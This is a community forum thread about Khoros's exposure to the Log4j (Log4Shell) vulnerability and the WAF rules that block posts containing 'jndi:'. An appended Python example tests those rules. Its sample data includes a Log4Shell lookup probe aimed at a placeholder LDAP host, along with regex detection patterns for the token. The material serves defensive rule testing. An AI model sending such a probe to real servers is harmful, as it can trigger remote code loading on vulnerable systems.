Forum Discussion

jpadilla
3 years ago

Is community impacted by Log4J vulnerability?

Is Khoros Community impacted by this log4j vulnerability: CVE-2021-44228

  • Got this response from our TAM today when asking for info:

    "We completed a thorough investigation of our global infrastructure since we were made aware of the flaw on December 10 and found zero indication of any successful exploitation of this vulnerability in our environment. Further, we have identified and mitigated all of the known risks resulting from the vulnerability in our environment. As of 2021-12-11 2:45pm CT, all Khoros product infrastructure is considered mitigated against the known risk of this vulnerability.

    We continue to remain vigilant while assessing our overall security posture and will further review our systems and services for potential risk and take appropriate actions should any new information about the vulnerability be discovered. "
    • Drew_C
      Boss

      Thanks for sharing this here. I was preparing to ask the same questions.

      It would be nice to have an official statement from Khoros posted somewhere though.

  • IanKl
    Khoros Alumni (Retired)

    The engineering teams worked very hard before the holidays to get everything locked down, updated, and fixed, and are continuing to be on top of this and other security issues. Site and data security is our top priority. 

    HelgaMarieAuran's answer from her TAM is correct: 

    "We completed a thorough investigation of our global infrastructure since we were made aware of the flaw on December 10 and found zero indication of any successful exploitation of this vulnerability in our environment. Further, we have identified and mitigated all of the known risks resulting from the vulnerability in our environment. As of 2021-12-11 2:45pm CT, all Khoros product infrastructure is considered mitigated against the known risk of this vulnerability.

    We continue to remain vigilant while assessing our overall security posture and will further review our systems and services for potential risk and take appropriate actions should any new information about the vulnerability be discovered. "
  • I am attempting to publish our company's response on the community but get a 403 error on it. Anyone else encountering an issue publishing a statement on the Khoros platform? It is only this post and I even stripped it down to basic formatting and can't get it to publish. It appears to be some type of block on content related to the topic? 

    • Notmark-VFZ
      Mentor

      allisonable wrote:

      It appears to be some type of block on content related to the topic? 


      It seems (after some trial and error) the phrase "jndi" plus ":" is being blocked by Khoros in all input forms generating a 403 forbidden error.

      Try removing that phrase from the topic (if it's in there at all)?

      • tyw
        Boss

        allisonable & Notmark-VFZ

        I think the issue you're seeing is related to Web Application Firewall (WAF) changes that may have been made on your site. We hit this with the word 'localhost'. No matter what we did, that word caused a 403 error. 

        After checking in with Support they asked me to review the WAF email and sure enough that was the culprit. 

        Check your inbox for "Khoros Web Application Firewall (WAF) rollout". If you don't have the email, I'd contact Support and ask if this is WAF related, based on this:

        "While the rules and filters have been vetted and tested prior to being rolled out, due to the nature and customizability of the Community platform, there is a small risk that there could be some level of unexpected impact. Issues caused by the WAF will result in end-users receiving a 403 forbidden response to an operation. Please contact Support if you see this behavior and provide as much detail as possible about the action you were taking and the timing of that action (including time zone information)."

  • Thanks HelgaMarieAuran for sharing that update, had our own Security team asking today. (Also, it would be nice if Khoros were proactively sending this out...)


  • As mentioned on various websites, early adopters who deployed version 2.15 aren't fully safe, so the question is: does Khoros use version 2.16 in the meantime?

     

    Thank you 🤞

    • -dirk-
      Maven

      Khoros support is very fast and answered me via case ticket:


      Yes, Khoros uses log4j version 2.16.

      khoros: Good job 👍


  • tyw wrote:

    I think the issue you're seeing is related to Web Application Firewall (WAF) changes that may have been made on your site. We hit this with the word 'localhost'. No matter what we did, that word caused a 403 error. 

    After checking in with Support they asked me to review the WAF email and sure enough that was the culprit. 


    The 403 forbidden error is definitely because of the WAF, and rightly so!

    It's basically the 1st line of defense in preventing any kind of attack using the Log4Shell vulnerability. The WAF blocks "jndi" followed by ":" because that is a must in the string used to start the attack.

    So even if you have a vulnerable server, the server will not receive any malicious strings because you're blocking it before it even gets sent to the server.
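The two 403 cases in this thread (the legitimate post that quoted the blocked token, and the probe string the WAF is meant to stop) can be replayed against a rule in a few lines. This is an added example, not Khoros's WAF configuration: the request bodies are constructed, the broad rule is the "jndi" followed by ":" behaviour described above, and the narrower rule requiring the `${` lookup opener is my assumption about how such a rule could be tightened.

```python
import re
from typing import Dict, FrozenSet, List, Pattern

# Constructed sample request bodies (not taken from the thread). Each is the
# text a user submits through a Community input form that the WAF inspects.
SAMPLES: Dict[str, str] = {
    # A Log4Shell probe: the lookup syntax a vulnerable logger would resolve.
    "attack": "User-Agent: ${jndi:ldap://example.invalid/a}",
    # A legitimate post that merely quotes the token while discussing the fix.
    "forum_post": "Our statement: the jndi: lookup is disabled across our Java services.",
    # Unrelated content that neither rule should touch.
    "benign": "Thanks for sharing the TAM update, our security team was asking today.",
}

# Broad rule, as described in the thread: "jndi" followed by ":" anywhere in the input.
BROAD: Pattern[str] = re.compile(r"jndi\s*:", re.IGNORECASE)
# Narrower rule (an assumption, not Khoros's rule): also require the ${ lookup
# opener, so a plain-text mention of the token is not treated as an injection.
NARROW: Pattern[str] = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

ATTACK_LABELS: FrozenSet[str] = frozenset({"attack"})


def waf_decision(body: str, rule: Pattern[str]) -> int:
    """Return the HTTP status the WAF hands back: 403 if the rule fires, else 200."""
    return 403 if rule.search(body) else 200


def evaluate(rule: Pattern[str], samples: Dict[str, str] = SAMPLES) -> Dict[str, int]:
    """Run one rule over every sample and report the decision per sample label."""
    return {label: waf_decision(body, rule) for label, body in samples.items()}


def false_positives(rule: Pattern[str], samples: Dict[str, str] = SAMPLES) -> List[str]:
    """Labels of non-attack samples the rule blocks (the 403s reported in the thread)."""
    decisions = evaluate(rule, samples)
    return sorted(label for label, status in decisions.items()
                  if status == 403 and label not in ATTACK_LABELS)


if __name__ == "__main__":
    for name, rule in (("broad", BROAD), ("narrow", NARROW)):
        print(name, evaluate(rule), "false positives:", false_positives(rule))
```

Both rules return 403 for the probe; only the broad rule also blocks the post that quotes the token, which is the trade-off between recall and precision that Support has to weigh when a customer reports a 403.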